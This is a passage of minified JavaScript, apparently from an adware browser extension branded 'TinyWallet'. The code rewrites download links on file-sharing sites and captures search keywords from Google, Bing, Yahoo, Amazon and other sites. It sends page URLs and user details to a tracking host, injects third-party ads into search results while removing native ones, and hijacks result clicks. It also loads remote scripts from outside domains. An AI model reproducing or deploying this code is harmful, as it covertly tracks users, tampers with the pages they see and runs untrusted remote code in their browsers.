e=h.parentNode,k=document.createElement(\"div\");k.className=\"method_title\";var l=document.createElement(\"i\"),m=document.createElement(\"span\");m.setAttribute(\"id\",\"timer_count\");m.innerText=\"Download for free\";m.textContent=\"Download for free\";\nk.appendChild(l);k.appendChild(m);e.insertBefore(k,h);e.removeChild(h)}},1E3)}};this[\"flexydrive.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"file21desktop.com\")){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"media1fire.com\"]=new function(){this.init=function(){var h=p.utils.query_selector_all('input[name=\"adcopy_response\"]');0<h.length&&(h[0].disabled=\n!0);for(h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"file21desktop.com\")){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"softwareandgames.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"softwareandgames.com/download\")){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};\nthis[\"programmesetjeux.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"programmesetjeux.com/telecharger\")){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"baixarjogos.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"baixarjogos.com/baixar\")){var k=\np.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"descargarjuegos.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"descargarjuegos.com/descargar\")){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"hotfiles.ro\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],\nk=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"hotfil.es/goref.php\")){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"vitanclub.net\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"/ad/goref.php\")){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}h=document.getElementById(\"container_bottom\");p.utils.coverElement(h)}};\nthis[\"mirrorcreator.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&(-1<k.indexOf(\"getsecuredfiles.com/mirrorc\")||-1<k.indexOf(\"westzip.in/\"))){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"mestorrents.com\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"pubted.com/www/delivery/\")){var k=\np.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this[\"vitorrent.net\"]=new function(){this.init=function(){for(var h=0;h<document.links.length;h++){var e=document.links[h],k=e.getAttribute(\"href\");if(k&&-1<k.indexOf(\"/file.php\")){var k=p.utils.duplicateElement(e),l=e.parentNode;l.insertBefore(k,e);l.removeChild(e)}}}};this.injectHidden=function(){var h=document.createElement(\"input\");h.type=\"hidden\";h.setAttribute(\"id\",\"sadkf345hks78923dkcvsdf\");document.getElementsByTagName(\"body\")[0].appendChild(h)};\nif(!document.getElementById(\"sadkf345hks78923dkcvsdf\"))if(\"undefined\"!==typeof this[location.host]&&this.activeZds[location.host]&&window.self==window.top&&1==this.activeZds[location.host])this[location.host].init(),this.injectHidden();else for(var u in this.activeZds)if(-1<location.host.indexOf(u)&&1==this.activeZds[u])try{this[u].init(),this.injectHidden()}catch(y){}};;window.top==window.self&&new function(){if(!document.getElementsByTagName(\"body\").length||!document.getElementsByTagName(\"body\")[0].getAttribute(\"s4273800016501002566\")){var m=document.getElementsByTagName(\"body\")[0];m&&m.setAttribute(\"s4273800016501002566\",\"1\");var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"TinyWallet\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;e<a.length;e++){var f=a[e];b=new Image;b.src=f}else b=new Image,b.src=a};a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+ c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c;\" \"==g.charAt(0);)g=g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(b,d){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",b,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&d(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(b, d,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",b,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};d=encodeURIComponent(d);this.xhr.send(d)}};a.waitForTokens={};a.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a); Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©;clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}}; a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all= document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f= this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"== navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href: \"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname);f.src=b.pixelHost+\"?hid=4273800016501002566&eid=1089&pid=11214&prodid=186&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=CA&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+ b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()}, !1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&& (b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}}, infospace:{hrefSelector:\".resultTitle\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"http://search.infospace.com/search/*\"],src_for_keyword:\"#topSearchTextBox\",validate:function(){b.utils.ping(\"validate2\");return!0}},wow:{hrefSelector:\".find\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"http://www.wow.com/search?*\"],src_for_keyword:\"#csbquery1\",validate:function(){b.utils.ping(\"validate2\");return!0}},duckduckgo:{hrefSelector:\".result__a\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"://duckduckgo.com/?q=*\"],src_for_keyword:\"#search_form_input\", validate:function(){b.utils.ping(\"validate2\");return!0}},contenko:{hrefSelector:\"#title\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"://contenko.com/#/?q=*\"],src_for_keyword:\"#searchBar input[type='text']\",validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs  a[id^=r]\",unique_search_divs:\"1\", urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"== a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\",\"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\", tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"),!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0], !1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\",urls:[\"http://www.amazon.com*&field-keywords=*\"],src_for_keyword:\"#twotabsearchtextbox\", validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}},superpages:{unique_search_divs:\"1\",urls:[\"http://yellowpages.superpages.com/listings.jsp?*\"],src_for_keyword:\"input[type='text']#what\", validate:function(){return!0}},yelp:{unique_search_divs:\"1\",urls:[\"http://www.yelp.com/search?find_desc=*\"],src_for_keyword:\"input#find_desc\",validate:function(){b.num_of_items_in_one=1;return!0}},yellowpages:{unique_search_divs:\"1\",urls:[\"http://www.yellowpages.com/search?search_terms=*\"],src_for_keyword:\"input[type='text']#query\",validate:function(){return!0}},info:{unique_search_divs:\"1\",urls:[\"http://www.info.com/search?*\"],src_for_keyword:\"input[type='text']#qkw0\",validate:function(){return!0}}, webcrawler:{unique_search_divs:\"1\",urls:[\"http://www.webcrawler.com/search/web?*\"],src_for_keyword:\"input[type='text']#topSearchTextBox\",validate:function(){return!0}},webssearches:{unique_search_divs:\"1\",urls:[\"http://search.webssearches.com/search/web?*\",\"http://istart.webssearches.com/web/?q=*\",\"http://istart.webssearches.com/web?q=*\"],src_for_keyword:[\"input[type='search']#topSearchTextBox\",\"input[type='text']#q\"],validate:function(){b.num_of_items_in_one=2;return!0}},mywebsearch:{unique_search_divs:\"1\", urls:[\"http://search.mywebsearch.com/mywebsearch/*\"],src_for_keyword:[\"input#q\"],validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e); g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b= 0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f= b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"== a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1, 1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)\"string\"===typeof a&&(a=a.replace(/\\\"/g,'\\\\\"'));return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&& (c=b.escape_chars_for_json©);a=JSON.stringify(a);d=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(var e=0;e<d.length;e++)a=a.replace(RegExp(\"\\\\[##\"+d[e].replace+\"##\\\\]\",\"g\"),d[e][\"with\"]);try{return\"undefined\"!==typeof c.pxl&&\"\"!==c.pxl&&b.utils.sendPixels(c.pxl),JSON.parse(a)}catch(f){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling): a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k))return k;return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault? b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var n=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a);(function(a,c){c&&c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(var e=0;e<b.num_of_items_in_one&&0!=c.length;e++){var f=b.get_item_json(a,c[0]);try{b.insert_point.children.push(f)}catch(g){b.insert_point= d,b.insert_point.children.push(f)}\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()}};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(n);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g= 0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;n=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.addExtensionName=function(a){var c=JSON.stringify(a.layouts.dom);if(!c.match(/\\[##eid##\\]/))return a;c=c.replace(/\\[##eid##\\]/g,b.eid);a.layouts.dom=JSON.parse©;return a};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&& b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a=b.addExtensionName(a)}catch(e){}try{a.node=b.create_search(a)}catch(f){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)}, !1,a[c],!0)};b.addCloseFunctionality=function(){function a(a){for(var b=a.className.split(\" \"),c=0;c<b.length;c++)if(\"yael\"===b[c])return a;if(!a.parentElement)return!1;a=a.parentElement;return arguments.callee(a)}var c=b.utils.query_selector_all(\".yael_close_btn\");if©for(var d=0;d<c.length;d++)b.events.add(\"click\",function(){try{var b=a(this)}catch©{}b&&b.parentElement.removeChild(b)},!1,c[d],\"closeBtn\")};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl, b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick();b.addCloseFunctionality();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href, b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(), !1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]); b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+ \"&hid=4273800016501002566&eid=1089&pid=11214&prid=186\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){\"\"!= a&&(window.__yael_res=JSON.parse(a),window.__yael_res.config.targets.header.num_of_items_in_one&&(b.num_of_items_in_one=window.__yael_res.config.targets.header.num_of_items_in_one),\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search()))})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1, b.inputElement,!1)}};;new function(){if(!(document.getElementById(\"sdjksjsksjdskjd__0\")||window.self!=window.top||-1<location.host.indexOf(\"google.com\")||-1<location.host.indexOf(\"bing.com\")||-1<location.host.indexOf(\"yahoo.com\"))){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.setAttribute(\"id\",\"sdjksjsksjdskjd__0\");a.src=\"//cdncache-a.akamaihd.net/loaders/1750/l.js?aoi=1311798366&pid=1750&zoneid=13702660&ext=TinyWallet&systemid=4273800016501002566&ext=TinyWallet\";document.getElementsByTagName(\"head\")[0].appendChild(a)}};;new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4450fm\")&&window.self==window.top&&\"http:\"==window.self.location.protocol){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wp.js?subid=1089_11214&hid=4273800016501002566&bname=TinyWallet\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4450fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var 